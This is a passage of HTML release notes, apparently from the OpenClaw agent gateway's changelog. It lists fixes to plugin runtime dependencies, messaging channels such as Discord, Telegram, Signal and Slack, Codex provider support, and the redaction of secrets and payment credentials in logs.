<p>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</p>
</li>
<li>
<p>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</p>
</li>
<li>
<p>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</p>
</li>
<li>
<p>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</p>
</li>
<li>
<p>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</p>
</li>
<li>
<p>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</p>
</li>
<li>
<p>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</p>
</li>
<li>
<p>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</p>
</li>
<li>
<p>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</p>
</li>
<li>
<p>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</p>
</li>
<li>
<p>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</p>
</li>
<li>
<p>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</p>
</li>
<li>
<p>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</p>
</li>
<li>
<p>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</p>
</li>
<li>
<p>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</p>
</li>
<li>
<p>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</p>
</li>
<li>
<p>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</p>
</li>
<li>
<p>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</p>
</li>
<li>
<p>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</p>
</li>
<li>
<p>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</p>
</li>
<li>
<p>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</p>
</li>
<li>
<p>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</p>
</li>
<li>
<p>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</p>
</li>
<li>
<p>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</p>
</li>
<li>
<p>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks @heyhudson.</p>
</li>
<li>
<p>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks @fgabelmannjr and @k7n4n5t3w4rt.</p>
</li>
<li>
<p>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks @velvet-shark.</p>
</li>
<li>
<p>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks @0xCyda, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and @Marvae.</p>
</li>
<li>
<p>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Telegram: echo preflighted DM voice-note transcripts back to the originating chat, including Telegram DM topic thread metadata, instead of only echoing later media-understanding transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358306338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75084" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75084/hovercard" href="https://github.com/openclaw/openclaw/issues/75084">#75084</a>. Thanks @M-Lietz.</p>
</li>
<li>
<p>Telegram: clamp low long-polling client timeouts so configured <code>timeoutSeconds</code> values below the <code>getUpdates</code> poll window no longer force a fresh HTTPS connection every few seconds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358955789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75114/hovercard" href="https://github.com/openclaw/openclaw/issues/75114">#75114</a>. Thanks @hpinho77.</p>
</li>
<li>
<p>Web search: describe <code>web_search</code> as using the configured provider instead of hard-coding Brave when DuckDuckGo or another provider is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358379474" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75088/hovercard" href="https://github.com/openclaw/openclaw/issues/75088">#75088</a>. Thanks @sun-rongyang.</p>
</li>
<li>
<p>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks @Kane808-AI and @jarvisz8.</p>
</li>
<li>
<p>Agents/compaction: add an opt-in <code>agents.defaults.compaction.midTurnPrecheck</code> mid-turn precheck that detects tool-loop context pressure and triggers compaction before the next tool call instead of waiting for end-of-turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342551639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73499/hovercard" href="https://github.com/openclaw/openclaw/pull/73499">#73499</a>) Thanks @marchpure and @haoxingjun.</p>
</li>
<li>
<p>Gateway/approvals: let loopback token/password-backed native approval clients resolve exec approvals without attaching stale paired Gateway identities, while remote and unauthenticated approval clients keep normal device identity behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352121168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74472/hovercard" href="https://github.com/openclaw/openclaw/pull/74472">#74472</a>)</p>
</li>
<li>
<p>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</p>
</li>
<li>
<p>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</p>
</li>
<li>
